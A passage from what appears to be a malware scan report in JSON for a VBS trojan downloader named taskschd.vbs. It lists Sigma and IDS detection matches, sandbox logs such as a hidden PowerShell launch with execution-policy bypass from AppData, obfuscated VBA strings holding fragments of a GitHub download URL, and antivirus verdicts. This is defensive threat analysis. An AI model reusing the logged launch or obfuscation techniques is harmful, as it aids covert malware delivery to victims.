}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -w 1 -file C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\system32\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "764276dba9654bf07d000fa390ae98de360ac172927cf3ef64f2db6c5b9be3b2",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic CSharp Compile Artefact",
"rule_description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\pz2o5amr\\pz2o5amr.cmdline",
"EventID": "11"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7ca43f2acf2c039e776af286dca2b5216d23967e6e8fe43dd5a5cc95f86e52e5",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Modification of IE Registry Settings",
"rule_description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence",
"rule_author": "frack113",
"match_context": [
{
"values": {
"EventID": "13",
"Details": "\u7f51\u7edc 10",
"EventType": "SetValue",
"TargetObject": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Wpad\\{F1935E60-F74E-4AF4-A5C5-9DA484C64343}\\WpadNetworkName"
}
}
]
}
],
"tags": [
"executes-dropped-file",
"create-ole",
"run-file",
"long-sleeps",
"calls-wmi",
"vba"
],
"vba_info": {
"strings": [
"Xmo",
"ipti",
"estg",
"ubusercontent.com/shantez4",
"ing",
"%LocALaPpDaTA%",
"tighe",
"WScript.Shell",
"ps://",
"XmocrpolncokeleXmoyXmoteniceect",
"aya",
"WOlf",
"winmgmts:\\\\root\\\\cimv2",
"III",
"nice",
"AlTEMPAla2d3acd4x6456x4029x8503x6cc4267x1d9bayatmpayabat",
"coke",
"GesdcingesdcTesdc",
"Win32_ProcessStartup",
"LHT",
"mobj",
"aaa",
"g.Fi",
"httestgraw.githIII41/EDGTy/refs/heads/matighe",
"pol",
"in/hawek.ini",
"winmgmts:win32_process",
"esdc",
"MaaaicraaaosoWOaaalf.XMPaaaNGTP",
"PNG"
]
},
"sigma_analysis_stats": {
"critical": 0,
"high": 7,
"medium": 8,
"low": 3
},
"last_submission_date": 1773806428,
"size": 1562,
"sha1": "77b21660041e26464e94e737babb43ebe95b91f1",
"type_tags": [
"source",
"vba",
"vbs"
],
"sha256": "7ed250363d5c2714a79e826cef1690ed155bbc0500b67a7344db61fc7a03ed48",
"first_submission_date": 1773806428,
"type_description": "VBA",
"magic": "ASCII text, with very long lines (1560u), with CRLF line terminators",
"last_analysis_date": 1780688031,
"times_submitted": 1,
"unique_sources": 1,
"type_extension": "vbs",
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 4,
"medium": 8,
"low": 3
},
"Joe Security Rule Set (GitHub)": {
"critical": 0,
"high": 1,
"medium": 0,
"low": 0
}
},
"crowdsourced_ids_stats": {
"high": 0,
"medium": 0,
"low": 0,
"info": 1
},
"crowdsourced_ids_results": [
{
"rule_category": "Potential Corporate Privacy Violation",
"alert_severity": "info",
"rule_msg": "ET POLICY Dropbox.com Offsite File Backup in Use",
"rule_id": "1:2012647",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert tls [108.160.162.0/20,162.125.0.0/16,192.189.200.0/23,199.47.216.0/22,205.189.0.0/24,209.99.70.0/24,45.58.64.0/20] 443 -> $HOME_NET any (msg:\"ET POLICY Dropbox.com Offsite File Backup in Use\"; flow:established,to_client; tls.cert_subject; content:\"CN=*.dropbox.com\"; fast_pattern; threshold: type limit, count 1, seconds 300, track by_src; reference:url,www.dropbox.com; reference:url,dereknewton.com/2011/04/dropbox-authentication-static-host-ids/; classtype:policy-violation; sid:2012647; rev:7; metadata:created_at 2011_04_07, confidence High, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_03_25;)",
"rule_references": [
"https://www.dropbox.com",
"https://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/"
],
"alert_context": [
{
"src_ip": "162.125.8.18",
"src_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"b44baa8a20901c5663b3a9664ba8a767"
]
},
{
"src_ip": "162.125.70.18",
"src_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"b44baa8a20901c5663b3a9664ba8a767"
]
}
]
}
],
"vhash": "5245be45d22f58b190e85159ec707294",
"reputation": 0,
"ssdeep": "24:9A+HDjn8RJ0Ek2LMxW96O6HvSbVCjUW+Hd++HJ+HlG4AoiRrm5y5e9F1m0A1:e+HKJ0EdMs9pJ0ZiRr6d9dA1",
"last_analysis_stats": {
"malicious": 27,
"suspicious": 0,
"undetected": 32,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 2,
"type-unsupported": 14
},
"meaningful_name": "taskschd.vbs",
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"EVADER"
],
"sandbox_name": "Zenbox",
"confidence": 76
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
},
"C2AE": {
"category": "undetected",
"malware_classification": [
"UNKNOWN_VERDICT"
],
"sandbox_name": "C2AE"
}
},
"filecondis": {
"dhash": "fab4bab6acd4e2d2",
"raw_md5": "2bac05b8dd370ab8dc0289cc35c1b9cc"
},
"type_tag": "vba",
"names": [
"taskschd.vbs"
],
"md5": "d9d7d5feb2abc828b58142fc63509d80",
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.Script.Generic.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.GenericKD.79729103"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260605",
"category": "malicious",
"result": "vba.trojan.generic"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260605",
"category": "malicious",
"result": "BehavesLike.VBS.Dropper.zp"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.Script.Agent"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.238",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.GenericKD.79729103"
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.55.59729",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.55.59728",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1222",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260605",
"category": "malicious",
"result": "VBS/TrojanDownloader.Agent.ADFL trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260605",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260605",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260605",
"category": "malicious",
"result": "HEUR:Trojan.VBS.SAgent.gen"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.GenericKD.79729103"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.Script.Donoff.drfzbv"
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260605",
"category": "malicious",
"result": "VBS.S.Downloader.1562"
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260605",
"category": "malicious",
"result": "Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:DR7MRBLbLDS)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260605",
"category": "malicious",
"result": "Dropper.DR/SNH"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5615",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14833",
"engine_update": "20260605",
"category": "malicious",
"result": "ti!7ED250363D5C"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.GenericKD.79729103 (B)"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44803AVA:64.31368",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.GenericKD.79729103"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260605",
"category": "malicious",
"result": "ABTrojan.ZEPP-"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260605",
"category": "malicious",
"result": "DR/SNH"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.247.174",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38705",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.Generic.D4C091CF"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107326",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan:Win32/Ravartar!rfn"
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1780678858",
"engine_update": "20260605",
"category": "malicious",
"result": "Detected"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan/VBS.Agent.SC310212"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-05.02",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260605",
"category": "malicious",
"result": "Vbs.Trojan-Downloader.Der.Bujl"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "cde3466:cde3466:d28a123:d28a123",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260605",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan[downloader]:Win/Sonbokli.A9uj"
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260605",
"category": "failure",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260605",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260605-00",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.264",
"engine_update": "20260603",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.785",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
}
},
"popular_threat_classification": {
"popular_threat_category": [
{
"value": "trojan",
"count": 16
},
{
"value": "downloader",
"count": 5
},
{
"value": "dropper",
"count": 2
}
],
"suggested_threat_label": "trojan.abtrojan/adfl",
"popular_threat_name": [
{
"value": "abtrojan",
"count": 1
},
{
"value": "adfl",
"count": 1
},
{
"value": "bujl",
"count": 1
}
]
},
"total_votes": {
"harmless": 0,
"malicious": 0
},
"last_modification_date": 1780695488,
"magika": "VBA",
"tlsh": "T1713110203B4099DBC46DF6E452C021F4B4F488D932A0D26E1961F28B3E6D0F707CD8D1"
}
}
}